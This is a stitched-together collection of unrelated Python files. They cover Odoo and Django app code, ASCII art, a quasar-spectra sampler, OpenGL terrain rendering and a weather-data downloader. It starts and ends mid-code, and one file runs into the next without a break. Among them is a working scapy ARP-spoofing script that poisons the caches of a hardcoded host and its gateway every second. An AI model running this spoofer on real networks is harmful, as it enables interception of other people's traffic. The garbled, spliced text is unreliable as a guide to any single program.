        Rental = request.env['library.rental']
        # Current calendar month: from the 1st through today.
        first_day = date.today().replace(day=1).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
        last_day = date.today().strftime(DEFAULT_SERVER_DATETIME_FORMAT)
        rental_month_domain = [('rental_date', '>=', first_day), ('rental_date', '<=', last_day)]
        book_month_domain = [('date', '>=', first_day), ('date', '<=', last_day)]
        lost_books = Rental.search([('state', '=', 'lost')] + rental_month_domain)
        nb_rentals = Rental.search_count(rental_month_domain)
        # 'book' presumably flags products that are library books — verify
        # against the product.product model extension.
        return {
            'money_in': sum(Payment.search(book_month_domain).mapped('amount')),
            'nb_rentals': nb_rentals,
            'nb_lost_books': len(lost_books),
            'money_lost': sum(lost_books.mapped('book_id').mapped('acquisition_price')),
            'nb_available_books': Book.search_count([('book', '=', True), ('book_state', '=', 'available')]),
            'nb_rented_books': Book.search_count([('book', '=', True), ('book_state', '=', 'rented')]),
            'nb_lost_books_total': Book.search_count([('book', '=', True), ('book_state', '=', 'lost')]),
        }
|
from django.db import models
class GroupBy(models.Aggregate):
    """Aggregate whose SQL is just its expression, used to inject a raw
    GROUP BY column into a Django ORM query.

    NOTE(review): relies on Django ORM internals (`source_expressions`,
    `get_group_by_cols`) — verify against the Django version in use.
    """
    template = '%(expressions)s'
    def __init__(self, expression, **extra):
        # Force a TextField output so the grouped value round-trips as text.
        super(GroupBy, self).__init__(
            expression,
            output_field=models.TextField(),
            **extra
        )
    def get_group_by_cols(self):
        # Group by the wrapped expression(s) themselves.
        return self.source_expressions
|
import numpy as np
import random
import cv2
def default_char_factory():
    """Return one random printable ASCII character (codes 33-125)."""
    return chr(random.randrange(33, 126))


def get_char(size, rate=2.3, char_factory=default_char_factory, func_show=None):
    """Render a (width x height/rate) character grid joined by newlines.

    char_factory supplies each visible character; func_show(r, c), when
    callable, decides whether a cell shows a character or a blank space.
    `rate` compensates for characters being taller than they are wide.
    """
    width, height = size
    rows = int(height / rate)
    lines = []
    for r in range(rows):
        cells = []
        for c in range(width):
            visible = func_show(r, c) if callable(func_show) else True
            cells.append(char_factory() if visible else ' ')
        lines.append(''.join(cells))
    return '\n'.join(lines)
def img2char(data, size, rate=2.3, char_factory=default_char_factory):
    """Convert a BGR image array into ASCII art of the given (w, h) size.

    The image is grayscaled, binarised at 127, resized to the character grid,
    and each nonzero cell is drawn with char_factory (zero cells -> space).
    """
    w, h = size
    copy = data.copy()
    copy = cv2.cvtColor(copy, cv2.COLOR_BGR2GRAY)
    threshold, copy = cv2.threshold(copy, 127, 255, cv2.THRESH_BINARY)
    copy = cv2.resize(copy, (w, int(h / rate)))
    copy[copy <= 0] = 0
    copy[copy > 0] = 1
    # BUG FIX: np.float was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin float is the documented replacement (same float64 dtype).
    copy = copy.astype(float)
    return get_char(size, rate, char_factory, func_show=lambda r, c: copy[r, c])
if __name__ == '__main__':
    # Demo: print a 100x100 block of random characters, then clear the screen.
    # BUG FIX: the bare `print expr` statement was Python-2-only; the
    # parenthesized call form works on both Python 2 and Python 3.
    print(get_char((100, 100)))
    import os
    os.system('clear')
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth import authenticate
# Create your views here.
# Controller - business logic
from quizapp.models import Question
from django.shortcuts import render
def index(request):
    """Render the quiz index page listing every question."""
    questions_list = Question.objects.all()
    return render(request, "quizapp/index.html", {'questions_list':questions_list})
def detail(request, question_id):
    """Grade a submitted answer for one question and re-render its page."""
    #Added comment
    message = ""
    is_correct = False
    if request.method == "POST":
        # NOTE(review): int(None) raises TypeError if the form posts no
        # "answer" field — confirm the template always submits one.
        answer_id = int(request.POST.get("answer"))
        # print(answer_id)
        #question_id = request.POST.get("question_id")
        print(answer_id, question_id)
        question = Question.objects.get(id=question_id)
        # Mark correct only when the submitted id matches a correct answer.
        for answer in question.answer_set.all():
            if answer.id == answer_id and answer.correct == True:
                message = "correct answer"
                is_correct = True
                break
        if not is_correct:
            message = "wrong answer"
    # Fetched (again, after a POST) for rendering the detail template.
    question = Question.objects.get(id=question_id)
    return render(request, "quizapp/detail.html", {'question':question,'message':message,'result':is_correct})
def login(request):
    """Authenticate a user; redirect to the index on success.

    BUG FIX: the success branch was a broken paste — `return r` followed by
    a dedented `edirect('index')` — which is a NameError at best.  It should
    be a single `return redirect('index')` (redirect is imported at the top
    of this module).
    """
    message = ""
    if request.method == "POST":
        username = request.POST.get("username")
        password = request.POST.get("password")
        user = authenticate(username=username, password=password)
        if user is None:
            message = "Either username or password is wrong"
        else:
            #message = "Login successful"
            return redirect('index')
    return render(request,"quizapp/login.html",{'message': message})
|
#
# This script implements functions for maximum likelihood
# estimation of a basis for a group of Quasar Spectra.
#
# Roughly, this procedure is the following:
# - Resample spectra from lam_obs into rest frame grid lam0, (using Z_spec)
# - Fit optimize basis and weights in an NMF-like framework (with normal errors)
#
import fitsio
import autograd.numpy as np
import autograd.numpy.random as npr
from scipy.optimize import minimize
from redshift_utils import load_data_clean_split, project_to_bands, sinc_interp, \
check_grad, fit_weights_given_basis, \
evaluate_random_direction, \
resample_rest_frame, get_lam0
from CelestePy.util.infer.slicesample import slicesample
from CelestePy.util.infer.hmc import hmc
from quasar_fit_basis import load_basis_fit, make_functions
import GPy
import os, sys
import cPickle as pickle
def save_basis_samples(th_samps, ll_samps, lam0, lam0_delta, parser, chain_idx):
    """Persist basis-fit samples: the sample matrix as .npy, the rest pickled."""
    # grab B value for shape info
    B = parser.get(th_samps[0,:], 'betas')
    # dump separately - pickle is super inefficient for the big array
    fbase = 'cache/basis_samples_K-%d_V-%d_chain_%d'%(B.shape[0], B.shape[1], chain_idx)
    np.save(fbase + '.npy', th_samps)
    with open(fbase + '.pkl', 'wb') as handle:
        # Pickled in this fixed order; load_basis_samples reads them back
        # in the same order.
        for obj in (ll_samps, lam0, lam0_delta, parser, chain_idx):
            pickle.dump(obj, handle)
def load_basis_samples(fname):
    """Load samples written by save_basis_samples.

    `fname` may carry any extension; the matching .npy and .pkl files next to
    its stem are read.  Returns the same six values in the saved order.
    """
    bname = os.path.splitext(fname)[0]
    th_samples = np.load(bname + ".npy")
    with open(bname + ".pkl", 'rb') as handle:
        ll_samps, lam0, lam0_delta, parser, chain_idx = \
            [pickle.load(handle) for _ in range(5)]
    return th_samples, ll_samps, lam0, lam0_delta, parser, chain_idx
def gen_prior(K_chol, sig2_omega, sig2_mu):
    """Draw one parameter vector th from the prior over (betas, omegas, mus).

    NOTE(review): relies on module-level globals `parser`, `lam0` and `K`
    that are only assigned inside the __main__ block below — this function
    is callable only after that setup has run.
    """
    th = np.zeros(parser.N)
    N = parser.idxs_and_shapes['mus'][1][0]
    # betas get a GP prior via the Cholesky factor; omegas/mus are iid normal.
    parser.set(th, 'betas', K_chol.dot(npr.randn(len(lam0), K)).T)
    parser.set(th, 'omegas', np.sqrt(sig2_omega) * npr.randn(N, K))
    parser.set(th, 'mus', np.sqrt(sig2_mu) * npr.randn(N))
    return th
if __name__=="__main__":
    ##################################################################
    ## SET INPUT PARAMS
    ##################################################################
    # CLI: [chain_idx] [Nsamps] [length_scale] [init_iter]
    # NOTE(review): bare `print` statements make this whole script Python 2.
    chain_idx = int(sys.argv[1]) if len(sys.argv) > 1 else 0
    Nsamps = int(sys.argv[2]) if len(sys.argv) > 2 else 100
    length_scale = float(sys.argv[3]) if len(sys.argv) > 3 else 40.
    init_iter = int(sys.argv[4]) if len(sys.argv) > 4 else 100
    K = 4
    print "==== SAMPLING CHAIN ID = %d ============== "%chain_idx
    print " Nsamps = %d "%Nsamps
    print " length_scale = %2.2f"%length_scale
    print " num init_iters = %d "%init_iter
    print " K = %d "%K
    ##################################################################
    ## load a handful of quasar spectra and resample
    ##################################################################
    lam_obs, qtrain, qtest = \
        load_data_clean_split(spec_fits_file = 'quasar_data.fits',
                              Ntrain = 400)
    N = qtrain['spectra'].shape[0]
    ## resample to lam0 => rest frame basis
    lam0, lam0_delta = get_lam0(lam_subsample=10)
    print " resampling de-redshifted data"
    spectra_resampled, spectra_ivar_resampled, lam_mat = \
        resample_rest_frame(qtrain['spectra'],
                            qtrain['spectra_ivar'],
                            qtrain['Z'],
                            lam_obs,
                            lam0)
    # clean nans: zero flux and zero inverse-variance (i.e. no information)
    X = spectra_resampled
    X[np.isnan(X)] = 0
    Lam = spectra_ivar_resampled
    Lam[np.isnan(Lam)] = 0
    ###########################################################################
    ## Set prior variables (K_chol, sig2_omega, sig2_mu)
    ###########################################################################
    sig2_omega = 1.
    sig2_mu = 500.
    # Matern-5/2 GP kernel over rest-frame wavelength for the basis rows
    beta_kern = GPy.kern.Matern52(input_dim=1, variance=1., lengthscale=length_scale)
    K_beta = beta_kern.K(lam0.reshape((-1, 1)))
    K_chol = np.linalg.cholesky(K_beta)
    K_inv = np.linalg.inv(K_beta)
    ##########################################################################
    ## set up the likelihood and prior functions and generate a sample
    ##########################################################################
    parser, loss_fun, loss_grad, prior_loss, prior_grad = \
        make_functions(X, Lam, lam0, lam0_delta, K,
                       Kinv_beta = K_inv,
                       K_chol = K_chol,
                       sig2_omega = sig2_omega,
                       sig2_mu = sig2_mu)
    # sample from prior
    npr.seed(chain_idx + 42) # different initialization per chain
    th = np.zeros(parser.N)
    parser.set(th, 'betas', .001 * np.random.randn(K, len(lam0)))
    parser.set(th, 'omegas', .01 * npr.randn(N, K))
    parser.set(th, 'mus', .01 * npr.randn(N))
    #print "initial loss", loss_fun(th)
    # sanity-check analytic gradients against finite differences
    check_grad(fun = lambda th: loss_fun(th) + prior_loss(th), # X, Lam),
               jac = lambda th: loss_grad(th) + prior_grad(th), #, X, Lam),
               th = th)
    ###########################################################################
    ## optimize for about 350 iterations to get to some meaty part of the dist
    ###########################################################################
    cache_fname = 'cache/basis_samples_K-4_V-1364_chain_%d.npy'%chain_idx
    if True and os.path.exists(cache_fname):
        print " initializing first sample from CACHE (pre-optimized)"
        th_samples, _, _, _, _, _ = \
            load_basis_samples(cache_fname)
        th = th_samples[0, :]
    else:
        # NOTE(review): `lambda(th): ...` is Python-2-only tuple-parameter
        # syntax; this script cannot run unchanged under Python 3.
        res = minimize(fun = lambda(th): loss_fun(th) + prior_loss(th),
                       jac = lambda(th): loss_grad(th) + prior_grad(th),
                       x0 = th,
                       method = 'L-BFGS-B',
                       options = {'gtol':1e-8, 'ftol':1e-8,
                                  'disp':True, 'maxiter':init_iter})
        th = res.x
    ##########################################################################
    # Sample Nsamps, adapt step size
    ##########################################################################
    # Sample basis and weights and magnitudes for the model
    th_samps = np.zeros((Nsamps, len(th)))
    ll_samps = np.zeros(Nsamps)
    curr_ll = -loss_fun(th) - prior_loss(th)
    print "Initial ll = ", curr_ll
    print "{0:15}|{1:15}|{2:15}|{3:15}|{4:15}".format(
        " iter ",
        " lnpdf ",
        " step_size ",
        " accept rate ",
        " num accepted")
    step_sz = .0008
    avg_accept_rate = .9
    Naccept = 0
    for n in range(Nsamps):
        # One HMC transition with adaptive step size
        th, step_sz, avg_accept_rate = hmc(
                 U = lambda(th): -loss_fun(th) - prior_loss(th),
                 grad_U = lambda(th): -loss_grad(th) - prior_grad(th),
                 step_sz = step_sz,
                 n_steps = 20,
                 q_curr = th,
                 negative_log_prob = False,
                 adaptive_step_sz = True,
                 min_step_sz = 0.00005,
                 avg_accept_rate = avg_accept_rate,
                 tgt_accept_rate = .55)
        ## store sample
        # NOTE(review): acceptance is inferred from a log-prob change, so a
        # proposal landing at identical log-prob would be miscounted.
        th_ll = -loss_fun(th) - prior_loss(th)
        if th_ll != curr_ll:
            Naccept += 1
        curr_ll = -loss_fun(th) - prior_loss(th)
        th_samps[n, :] = th
        ll_samps[n] = curr_ll
        if n % 10 == 0:
            print "{0:15}|{1:15}|{2:15}|{3:15}|{4:15}".format(
                " %d / %d "%(n, Nsamps),
                " %2.4f"%ll_samps[n],
                " %2.5f"%step_sz,
                " %2.3f"%avg_accept_rate,
                " %d "%Naccept)
        # periodic checkpoint every 200 samples
        if n % 200 == 0:
            save_basis_samples(th_samps, ll_samps, lam0, lam0_delta, parser, chain_idx)
    # write them out
    save_basis_samples(th_samps, ll_samps, lam0, lam0_delta, parser, chain_idx)
|
import scapy.all as scapy
import time
import argparse
import sys
# spoofer function that uses scapy.send to push forged ARP replies to a victim
def spoofer(targetIP, spoofIP, targetMAC='b8:27:eb:ee:a1:9f'):
    """Send one forged ARP "is-at" reply to targetIP, claiming spoofIP.

    targetMAC was previously hard-coded (the RPi's MAC); it is now a
    parameter with the same value as its backward-compatible default.
    op=2 marks the packet as an ARP reply.
    """
    packet=scapy.ARP(op=2,pdst=targetIP,hwdst=targetMAC,psrc=spoofIP)
    scapy.send(packet, verbose=False)
# restore function run on KeyboardInterrupt: re-announces the real mapping
# (count=4 sends several replies so the victim's ARP cache is repaired)
def restore(destinationIP, sourceIP, destinationMAC='b8:27:eb:ee:a1:9f', sourceMAC='f0:79:60:2a:eb:a6'):
    """Send genuine ARP replies to undo the spoofing.

    The MAC addresses were previously hard-coded (RPi and attacking laptop);
    they are now parameters with backward-compatible defaults.
    """
    packet = scapy.ARP(op=2,pdst=destinationIP,hwdst=destinationMAC, psrc=sourceIP,hwsrc=sourceMAC)
    scapy.send(packet, count=4,verbose=False)
packets = 0
try:
    # Poison both directions once per second until interrupted.
    while True:
        #.227 - RPi address, 1.1 - gateway address
        spoofer('192.168.1.227','192.168.1.1')
        spoofer('192.168.1.1','192.168.1.227')
        # (dropped a stray Python-2 trailing comma after this print call;
        # under Python 3 it was a no-op tuple expression)
        print("Sending packet number: " + str(packets))
        packets +=1
        #sending a packet every 1 second
        time.sleep(1)
except KeyboardInterrupt:
    print("Sent " + str(packets) + " packets. Stopping now!")
    restore('192.168.1.227','192.168.1.1')
    # BUG FIX: was '192.168.1.22' (missing the final 7) — the restore must
    # target the same RPi address (.227) that was being spoofed above,
    # otherwise the gateway's ARP cache is repaired with the wrong host.
    restore('192.168.1.1','192.168.1.227')
# Window and terrain-grid configuration
SCREEN_SIZE=(1280, 768)
DATA_SIZE=32
WORLD_HEIGHT=5
# Renderer feature toggles
OPTS_ENABLE_NORMALS=True
OPTS_ENABLE_TEXTURES=True
OPTS_ENABLE_FACES=True
OPTS_ENABLE_LIGHTING=True
# Base ids for GL buffer objects; terrain row i uses base+i.
# NOTE(review): these ids are never reserved via glGenBuffers — this relies
# on the driver accepting arbitrary buffer names; confirm.
VERTEX_BUFFERS=10000
NORMAL_BUFFERS=20000
TEXTURE_BUFFERS=30000
from math import radians
from texgen.tools import *
from Image import *
from OpenGL.GL import *
from OpenGL.GLU import *
import numpy
import pygame
from pygame.locals import *
from gameobjects.matrix44 import *
from gameobjects.vector3 import *
# Placeholder overwritten with the GL texture id in LoadGLTextures()
texture = range(1)
class Image:
    """Simple holder for decoded image data, populated by ImageLoad().

    NOTE(review): shadows any `Image` name pulled in by the star-import
    above — confirm that is intentional.
    """
    sizeX = 0    # width in pixels
    sizeY = 0    # height in pixels
    data = None  # raw "RGBX" pixel bytes produced by tostring()
def ImageLoad(filename, image):
    """Decode an image file into the given Image holder.

    NOTE(review): `open` here must be PIL's Image.open brought in by
    `from Image import *` (a builtin file object has no .size) — confirm.
    """
    #PIL makes life easy...
    poo = open(filename)
    image.sizeX = poo.size[0]
    image.sizeY = poo.size[1]
    # "RGBX" pads to 4 bytes/pixel; the -1 presumably flips rows for GL's
    # bottom-left origin — verify against the PIL tostring() docs.
    image.data = poo.tostring("raw", "RGBX", 0, -1)
# Load Bitmaps And Convert To Textures
def LoadGLTextures():
    """Load the grass texture and upload it as the single GL texture."""
    global texture
    # Load Texture
    image1 = Image()
    ImageLoad("assets/grass_tex.jpg", image1)
    # Create Textures
    texture = glGenTextures(1)
    # linear filtered texture
    glBindTexture(GL_TEXTURE_2D, texture);   # 2d texture (x and y size)
    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR);   # scale linearly when image bigger than texture
    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR);   # scale linearly when image smalled than texture
    glTexImage2D(GL_TEXTURE_2D, 0, 4, image1.sizeX, image1.sizeY, 0, GL_RGBA, GL_UNSIGNED_BYTE, image1.data);
def resize(width, height):
    """Rebuild viewport and a 60-degree perspective projection for the new size."""
    glViewport(0, 0, width, height)
    glMatrixMode(GL_PROJECTION)
    glLoadIdentity()
    # near plane .1, far plane 1000
    gluPerspective(60.0, float(width)/height, .1, 1000.)
    glMatrixMode(GL_MODELVIEW)
    glLoadIdentity()
def init():
    """One-time GL state setup: textures, depth test, culling, lighting."""
    LoadGLTextures();   # load the textures.
    glEnable(GL_TEXTURE_2D)
    glEnable(GL_DEPTH_TEST)
    glShadeModel(GL_FLAT)
    # Wireframe mode when face rendering is disabled
    if not OPTS_ENABLE_FACES:
        glCullFace(GL_BACK)
        glPolygonMode(GL_BACK, GL_LINE)
        glPolygonMode(GL_FRONT, GL_LINE)
    # NOTE(review): the first glClearColor (sky blue) is immediately
    # overridden by the black one below — presumably a leftover toggle.
    glClearColor(0.5, 0.5, 1.0, 0.0)
    glClearColor(0.0, 0.0, 0.0, 0.0)
    glEnable(GL_COLOR_MATERIAL)
    # NOTE(review): lighting is enabled unconditionally; OPTS_ENABLE_LIGHTING
    # is never consulted here — confirm intended.
    glEnable(GL_LIGHTING)
    glEnable(GL_LIGHT0)
    glLight(GL_LIGHT0, GL_POSITION, [20.0, 20.0, 0.0, 0.0])
    glDepthFunc(GL_LEQUAL)
def bind_data_arrays(data, size):
    """Upload one triangle-strip row of terrain per heightmap row into GL
    vertex/normal/texcoord buffers.

    `data` is a 2D grid of 0-255 height samples; heights are scaled to
    [0, WORLD_HEIGHT].  Row x goes into buffer ids VERTEX_BUFFERS+x etc.
    NOTE(review): `size` is unused, and one normal is shared by all four
    vertices of each quad (flat shading) — confirm both are intended.
    """
    world_width = 1.0
    modifier = WORLD_HEIGHT
    x_pos = 0.0
    y_pos = 0.0
    vertex_buffer = VERTEX_BUFFERS
    normal_buffer = NORMAL_BUFFERS
    texture_buffer = TEXTURE_BUFFERS
    for x in range(len(data)-1):
        row = []
        tex = []
        norms = []
        for y in range(len(data[x])-1):
            # NOTE(review): resets y_pos to world_width (not 0.0) at each
            # row start — confirm the off-by-one-row offset is intended.
            if (y % len(data)) == 0: y_pos = world_width
            # Map the four corner heights of this grid cell into world units
            z_pos = (1.0/255.)*float(data[x][y])*modifier
            z_pos_a = (1.0/255.)*float(data[x][y+1])*modifier
            z_pos_b = (1.0/255.)*float(data[x+1][y])*modifier
            z_pos_c = (1.0/255.)*float(data[x+1][y+1])*modifier
            x_world = x_pos+world_width
            y_world = y_pos+world_width
            v1 = Vector3(x_pos, y_pos, z_pos)
            v2 = Vector3(x_pos, y_world, z_pos_a)
            v3 = Vector3(x_world, y_pos, z_pos_b)
            v4 = Vector3(x_pos+world_width, y_pos+world_width, z_pos_c)
            # One averaged direction for the whole quad, normalised
            vector = v1+v2+v3+v4
            n1, n2, n3 = vector.normalize().as_tuple()
            norms += [n1, n2, n3]
            norms += [n1, n2, n3]
            norms += [n1, n2, n3]
            norms += [n1, n2, n3]
            tex += [x_pos, y_pos,
                    x_pos, y_world,
                    x_world, y_pos,
                    x_world, y_world]
            row += [x_pos, y_pos, z_pos,
                    x_pos, y_world, z_pos_a,
                    x_world, y_pos, z_pos_b,
                    x_world, y_world, z_pos_c]
            y_pos += world_width
        x_pos += world_width
        # Upload this row's arrays into its own trio of buffer objects
        glBindBuffer(GL_ARRAY_BUFFER, vertex_buffer)
        glBufferData(GL_ARRAY_BUFFER, numpy.array(row,dtype='float32'), GL_STATIC_DRAW)
        glBindBuffer(GL_ARRAY_BUFFER, normal_buffer)
        glBufferData(GL_ARRAY_BUFFER, numpy.array(norms,dtype='float32'), GL_STATIC_DRAW)
        glBindBuffer(GL_ARRAY_BUFFER, texture_buffer)
        glBufferData(GL_ARRAY_BUFFER, numpy.array(tex,dtype='float32'), GL_STATIC_DRAW)
        vertex_buffer += 1
        normal_buffer += 1
        texture_buffer += 1
def draw():
    """Draw every terrain row as a triangle strip from the pre-bound buffers.

    Assumes bind_data_arrays() already filled buffers VERTEX_BUFFERS+i,
    NORMAL_BUFFERS+i and TEXTURE_BUFFERS+i for each of the DATA_SIZE rows.
    """
    glEnableClientState(GL_VERTEX_ARRAY)
    if OPTS_ENABLE_NORMALS: glEnableClientState(GL_NORMAL_ARRAY)
    if OPTS_ENABLE_TEXTURES: glEnableClientState(GL_TEXTURE_COORD_ARRAY)
    for i in range(DATA_SIZE):
        vertex_buffer = VERTEX_BUFFERS+i
        normal_buffer = NORMAL_BUFFERS+i
        texture_buffer = TEXTURE_BUFFERS+i
        # Point each client array at the bound buffer (offset 0)
        glBindBuffer(GL_ARRAY_BUFFER, texture_buffer)
        glTexCoordPointer(2, GL_FLOAT, 0, None)
        glBindBuffer(GL_ARRAY_BUFFER, vertex_buffer)
        glVertexPointer(3, GL_FLOAT, 0, None)
        glBindBuffer(GL_ARRAY_BUFFER, normal_buffer)
        glNormalPointer(GL_FLOAT, 0, None)
        glDrawArrays(GL_TRIANGLE_STRIP, 0, (DATA_SIZE*4)-1)
    if OPTS_ENABLE_NORMALS: glDisableClientState(GL_NORMAL_ARRAY);
    if OPTS_ENABLE_TEXTURES: glDisableClientState(GL_TEXTURE_COORD_ARRAY)
    glDisableClientState(GL_VERTEX_ARRAY)
'''
def draw(data):
world_width = 1.0
modifier = 5
x_pos = world_width
y_pos = world_width
glBindTexture(GL_TEXTURE_2D, texture) # pick the texture.
#y = 0
for x in range(len(data)-1):
glBegin(GL_TRIANGLE_STRIP)
for y in range(len(data[x])-1):
if (y % len(data)) == 0:
y_pos = world_width
z_pos = (1.0/255.)*float(data[x][y])*modifier
z_pos_a = (1.0/255.)*float(data[x][y+1])*modifier
z_pos_b = (1.0/255.)*float(data[x+1][y])*modifier
z_pos_c = (1.0/255.)*float(data[x+1][y+1])*modifier
v1 = Vector3(x_pos, y_pos, z_pos)
v2 = Vector3(x_pos, y_pos+world_width, z_pos_a)
v3 = Vector3(x_pos+world_width, y_pos, z_pos_b)
v4 = Vector3(x_pos+world_width, y_pos+world_width, z_pos_c)
vector = v1+v2+v3+v4
glNormal3dv(vector.normalize().as_tuple())
glTexCoord2f(x_pos,y_pos)
glVertex3f(x_pos, y_pos, z_pos);
glTexCoord2f(x_pos,y_pos+world_width)
glVertex3f(x_pos, y_pos+world_width, z_pos_a);
glTexCoord2f(x_pos+world_width,y_pos)
glVertex3f(x_pos+world_width, y_pos, z_pos_b);
glTexCoord2f(x_pos+world_width, y_pos+world_width);
glVertex3f(x_pos+world_width, y_pos+world_width, z_pos_c);
y_pos += world_width
x_pos += world_width
glEnd()
def draw_points(data):
world_width = 1.0
modifier = 5
x_pos = world_width
y_pos = world_width
y = 0
for x in range(len(data)-1):
glBegin(GL_TRIANGLE_STRIP)
for y in range(len(data[x])-1):
if (y % len(data)) == 0:
y_pos = world_width
z_pos = (1.0/255.)*float(data[x][y])*modifier
z_pos_a = (1.0/255.)*float(data[x][y+1])*modifier
z_pos_b = (1.0/255.)*float(data[x+1][y])*modifier
z_pos_c = (1.0/255.)*float(data[x+1][y+1])*modifier
v1 = Vector3(x_pos, y_pos, z_pos)
v2 = Vector3(x_pos, y_pos+world_width, z_pos_a)
v3 = Vector3(x_pos+world_width, y_pos, z_pos_b)
v4 = Vector3(x_pos+world_width, y_pos+world_width, z_pos_c)
vector = v1+v2+v3+v4
glNormal3dv(vector.normalize().as_tuple())
glEdgeFlag(GL_FALSE)
vector = v1+v2+v3+v4
glVertex3f(x_pos, y_pos, z_pos);
glVertex3f(x_pos, y_pos+world_width, z_pos_a);
glVertex3f(x_pos+world_width, y_pos, z_pos_b);
glVertex3f(x_pos+world_width, y_pos+world_width, z_pos_c);
y_pos += world_width
x_pos += world_width
glEnd()
'''
def run():
    """Main loop: set up pygame/OpenGL, build the terrain VBOs, then render
    while handling keyboard-driven camera and light movement until QUIT/ESC."""
    pygame.init()
    screen = pygame.display.set_mode(SCREEN_SIZE, HWSURFACE|OPENGL|DOUBLEBUF)
    resize(*SCREEN_SIZE)
    init()
    clock = pygame.time.Clock()
    # Camera transform matrix
    camera_matrix = Matrix44()
    camera_matrix.translate = (16.0, 16.0, 20.0)
    # white ambient light at half intensity (rgba)
    LightAmbient = [ 0.2, 0.5, 1.0, 0.1 ]
    # super bright, full intensity diffuse light.
    LightDiffuse = [ 0.0, 0.0, 1, 0.5 ]
    # position of light (x, y, z, (position of light))
    LightPosition = [ 32.0, 16.0, 5, 0.0 ]
    # NOTE(review): the three Light* lists above are defined but unused; the
    # loop below only sets GL_POSITION from light_x/light_y.
    light_x = 1.0
    light_y = 1.0
    # Initialize speeds and directions
    rotation_direction = Vector3()
    rotation_speed = radians(90.0)
    movement_direction = Vector3()
    movement_speed = 10.0
    # Build the Perlin-noise height field and upload it into VBOs.
    bind_data_arrays(get_perlin_data((DATA_SIZE, DATA_SIZE), 16.0, 2), DATA_SIZE)
    while True:
        for event in pygame.event.get():
            if event.type == QUIT:
                return
            if event.type == KEYUP and event.key == K_ESCAPE:
                return
        # Clear the screen, and z-buffer
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
        # Cap at 30 fps; time_passed drives frame-rate-independent motion.
        time_passed = clock.tick(30)
        time_passed_seconds = time_passed / 1000.
        pressed = pygame.key.get_pressed()
        # Reset rotation and movement directions
        rotation_direction.set(0.0, 0.0, 0.0)
        movement_direction.set(0.0, 0.0, 0.0)
        # Modify direction vectors for key presses:
        # arrows rotate about x/y, z/x roll, q/a move along the heading,
        # i/k and j/l move the light.
        if pressed[K_LEFT]:
            rotation_direction.y = +1.0
        elif pressed[K_RIGHT]:
            rotation_direction.y = -1.0
        if pressed[K_UP]:
            rotation_direction.x = -1.0
        elif pressed[K_DOWN]:
            rotation_direction.x = +1.0
        if pressed[K_z]:
            rotation_direction.z = -1.0
        elif pressed[K_x]:
            rotation_direction.z = +1.0
        if pressed[K_q]:
            movement_direction.z = -1.0
        elif pressed[K_a]:
            movement_direction.z = +1.0
        if pressed[K_i]:
            light_x = light_x+1.0
        elif pressed[K_k]:
            light_x = light_x-1.0
        if pressed[K_j]:
            light_y = light_y-1.0
        elif pressed[K_l]:
            light_y = light_y+1.0
        # Calculate rotation matrix and multiply by camera matrix
        rotation = rotation_direction * rotation_speed * time_passed_seconds
        rotation_matrix = Matrix44.xyz_rotation(*rotation)
        camera_matrix *= rotation_matrix
        # Calcluate movment and add it to camera matrix translate
        heading = Vector3(camera_matrix.forward)
        movement = heading * movement_direction.z * movement_speed
        camera_matrix.translate += movement * time_passed_seconds
        # Upload the inverse camera matrix to OpenGL
        glLoadMatrixd(camera_matrix.get_inverse().to_opengl())
        # Light must be transformed as well
        #glLight(GL_LIGHT0, GL_POSITION, (0, 1.5, 1, 0))
        # set up light number 1.
        glShadeModel(GL_SMOOTH)
        #glLightfv(GL_LIGHT1, GL_AMBIENT, LightAmbient) # add lighting. (ambient)
        glLight(GL_LIGHT0, GL_POSITION, [light_x, light_y, 0.0, 0.25])
        # draw textures
        # draw(data)
        # draw with arrays
        draw()
        # draw points
        #draw_points(data)
        # Show the screen
        pygame.display.flip()
# Start the demo when executed as a script.
if __name__ == "__main__":
    run()
|
import argparse
import datetime
import json
import os
import re
from pathlib import Path

import requests
import numpy as np
import dask
import dask.array as da
import dask.bag as db
import gdal, ogr, gdalnumeric, gdalconst

from utils.set_up_database import set_up_database
class User_input_pipeline(object):
    """Base class for the download pipelines: holds a date range and folders.

    Constructing an instance (and set_target_folder) creates the folder on
    disk if missing and then *changes the process working directory* into it —
    a process-wide side effect the subclasses rely on.
    """

    # Class-level defaults; instances overwrite them via __init__/setters.
    start_date = None
    end_date = None
    parent_folder = ''
    target_folder = ''

    def __init__(self, parent_folder='./data'):
        self.parent_folder = parent_folder
        self._check_create_folder(self.parent_folder)

    def set_start_date(self, start_date):
        """Record the (inclusive) start of the date range."""
        self.start_date = start_date

    def set_end_date(self, end_date):
        """Record the (inclusive) end of the date range."""
        self.end_date = end_date

    def set_target_folder(self, target_folder):
        """Select the output folder, creating and entering it."""
        self.target_folder = target_folder
        self._check_create_folder(self.target_folder)

    def _check_create_folder(self, folder_name):
        # Create when missing, then make it the current working directory.
        folder_missing = not os.path.isdir(folder_name)
        if folder_missing:
            os.mkdir(folder_name)
        os.chdir(folder_name)
class Knmi_data_source_retrieval(User_input_pipeline):
    """Download daily KNMI station observations (getdata_dag.cgi) for the
    configured date range and store the rows in the database."""

    def __init__(self, parent_folder='./data'):
        # FIX: the original called User_input_pipeline.__init__ *and*
        # super().__init__, running the folder-create/chdir side effect twice;
        # the second, relative chdir nested a data/data directory.
        super().__init__(parent_folder)

    def download_knmi_source_files(self, variables):
        """Fetch the given variable codes for all stations between start_date
        and end_date, insert the rows into the database and write a text dump.

        Errors are printed, not raised (best-effort download, as before).
        """
        base_url = 'http://projects.knmi.nl/klimatologie/daggegevens/getdata_dag.cgi'
        days_timedelta = self.end_date - self.start_date
        days_int = days_timedelta.days
        if days_int < 0:
            raise Exception('Start date should be set before end date')
        variables_download = ':'.join(variables)
        current_day_to_download_end = self.start_date + datetime.timedelta(days_int)
        current_day_to_download_formatted = self.start_date.strftime('%Y%m%d')
        current_day_to_download_end_formatted = current_day_to_download_end.strftime('%Y%m%d')
        http_request_params = {
            'stns': 'ALL',
            'start': current_day_to_download_formatted,
            'end': current_day_to_download_end_formatted,
            'vars': variables_download
        }
        http_knmi_source_request_handler = Knmi_http_request_handler(base_url)
        http_knmi_source_request_handler.set_http_request_params(http_request_params)
        try:
            response = http_knmi_source_request_handler.handle_http_request()
